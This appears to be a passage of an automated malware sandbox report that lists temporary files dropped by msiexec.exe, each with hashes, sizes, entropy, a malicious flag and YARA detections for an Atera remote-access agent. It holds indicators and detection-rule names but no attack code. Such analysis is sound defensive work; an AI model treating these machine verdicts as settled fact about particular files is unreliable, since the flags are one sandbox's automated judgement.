                                                                                                                                                                                                                                        SSDEEP:48:4D8PhPuRc06WXJEnT53DeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:4qhP1HnTpD7IciuBulU4
                                                                                                                                                                                                                                        MD5:DC61A0CDBF3DD456206101D76350E716
                                                                                                                                                                                                                                        SHA1:AD3416020998E9135D0A4A45D4F483B3C805D880
                                                                                                                                                                                                                                        SHA-256:63CF342EBFAE1EF9C46D60E0719A0E42B82E06E77EF89D011E07229AFE78CFB5
                                                                                                                                                                                                                                        SHA-512:B2F8C8055E6491B61E08ED5DE897E711CFA763F2843FBBBFDC3E3668D4E34E39A8A91D486A9B6D1C3F6603788F1CF759396E9D27E09B9D7A147B56FEB6704B3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6ED209FDEBEBE8CC.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.16374516525894073
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TEubmStedvPdv+qISoedvPdvbCnuhnq9FnCFF:hybIciuBulGF
                                                                                                                                                                                                                                        MD5:BB23FAFFAA6624C3CEBFCEC74C12572F
                                                                                                                                                                                                                                        SHA1:75E3187166BA47501DE885C015896E19CA33624A
                                                                                                                                                                                                                                        SHA-256:41F5726879AF0A651B6E5A5A33FAC4972C1511C142971EF2F39B7F4ED50A7A7E
                                                                                                                                                                                                                                        SHA-512:AF2A1C43DCC4714AB3D6B1C9434667C0D99C1E504E48D31A2086E4855C75F83988DC7EBE07CF2AB7785FEA8B34BD2B62E1D42CE4664EEFEBEA448AA6DCD5D0A5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF76E732F4A95E30F1.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF80A59696F5CFEB2C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5707321163549923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:58PhFuRc06WXz+FT5rdYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:0hF1jFT3n818I3DfNP
                                                                                                                                                                                                                                        MD5:170E02EA2A6FBD2AF83F2EAE5C71AE7D
                                                                                                                                                                                                                                        SHA1:C3BEA972F21522D925488282042EC29ACEFAEDCA
                                                                                                                                                                                                                                        SHA-256:B2A35392E5DBD55006AF16BAD76EDDAEDEC4F83AF394C887E96D90FBB240EF3C
                                                                                                                                                                                                                                        SHA-512:07CEC48054691B7D9FE4328364938F8A487A14E820CCA0D0CFBC3273A0B3C5E7A57AC4C9F37FCCB38258906897DF45C4FB1AFD6975FDA36F0318B772A67C54FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF815BDE1D565DD95C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.14516026263896395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TUSEuSsndYSjnd/EqdGUDjzbQXkJdYm8:AiWI3DfVTn8
                                                                                                                                                                                                                                        MD5:A410CFD599F90DE28F9A33DE288FFDF7
                                                                                                                                                                                                                                        SHA1:C28EA74AD89AFAA8E29A62166E0F17E05E975605
                                                                                                                                                                                                                                        SHA-256:52BB9AF3ED19102787685562CD7E2297048F80D530D700259CC9895C4B6297FB
                                                                                                                                                                                                                                        SHA-512:31ECA39D64C918BF9ED28C02DA7EF705856D41E8CE764527AB7EFA4FC8A33B43BDE3876FF8CC5EE0A910EFBBAE8B83324DFFB0A921829874A016466D90837899
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8D51130C93BB6C0C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF95A16CC7A7D38448.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.13082196273741126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:CnAipVfedGSadGS7qIipVGedGSadGSfEqasJGaWTZkB+r+n:CnAStedGPdGeqISoedGPdGTbAU
                                                                                                                                                                                                                                        MD5:2B2463D221C7498C31A2E35009993FE6
                                                                                                                                                                                                                                        SHA1:07738B10D2E7BD75E678E483ED2EB606E0F380BE
                                                                                                                                                                                                                                        SHA-256:3C152CF86D7BF56B278FF93F26A2942CCD44FB6A575DADE371F7DAF906641BF0
                                                                                                                                                                                                                                        SHA-512:509D9D4637E0CFE33C680A00BAD9537AAEDD65350A367AF12853DB6E0E74F121DC7064CF9CDA79365C6A0F8A44AA6D4E9679D49F3DFDBAF4D73535E5FB9A325E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9EA48A1BC6835568.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA50F4A555F2C8793.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220900366703216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhcuRc06WXJEnT5HDSqISoedGPdGTbaStedGPdGTn:9hc1HnT5DnIDD
                                                                                                                                                                                                                                        MD5:DA248B97146E4F5338555E5775646CEF
                                                                                                                                                                                                                                        SHA1:F5E887A3D1F69E7306EC6A6CC10106B3904712CF
                                                                                                                                                                                                                                        SHA-256:6559352E6BE0D37D4B95CBB2B565FD8BED3F975EAE2775884D460A6815A83D28
                                                                                                                                                                                                                                        SHA-512:9F1FDFB298D4F6BBA3943113D9069155A40E7AEF3F52A21DED2075DF91CC8AE4A550D7E9A33AB5AF950A026DE4569BCB498F3F169562B83C6F82A5F4BB794966
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA974D720F5B64201.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5707321163549923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:58PhFuRc06WXz+FT5rdYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:0hF1jFT3n818I3DfNP
                                                                                                                                                                                                                                        MD5:170E02EA2A6FBD2AF83F2EAE5C71AE7D
                                                                                                                                                                                                                                        SHA1:C3BEA972F21522D925488282042EC29ACEFAEDCA
                                                                                                                                                                                                                                        SHA-256:B2A35392E5DBD55006AF16BAD76EDDAEDEC4F83AF394C887E96D90FBB240EF3C
                                                                                                                                                                                                                                        SHA-512:07CEC48054691B7D9FE4328364938F8A487A14E820CCA0D0CFBC3273A0B3C5E7A57AC4C9F37FCCB38258906897DF45C4FB1AFD6975FDA36F0318B772A67C54FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB011B7D4783F73EF.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB3D323C48CA9AB48.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07773748638646297
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOE+sc/P0QhPbgVky6lW:2F0i8n0itFzDHFN1P0onW
                                                                                                                                                                                                                                        MD5:8E2DBA915D62F314B0A9F31196AE704A
                                                                                                                                                                                                                                        SHA1:CAFB0FBD3F4499C9D3D71516FF751E0373B5F16E
                                                                                                                                                                                                                                        SHA-256:26163C245CE1141831EFD7209B484DB34F9801E8398FBE0578E6AEB5AE0A1142
                                                                                                                                                                                                                                        SHA-512:18DD016DF80BFBA10D41070ECC2E0839A7D3AF5A75544F7CC0E6F906F45AB0B226E00E5ADAC644BAC2223B7D579636F045B882B41986BF0FC07E874902379D35
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB9516BEB2A4CA1D5.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
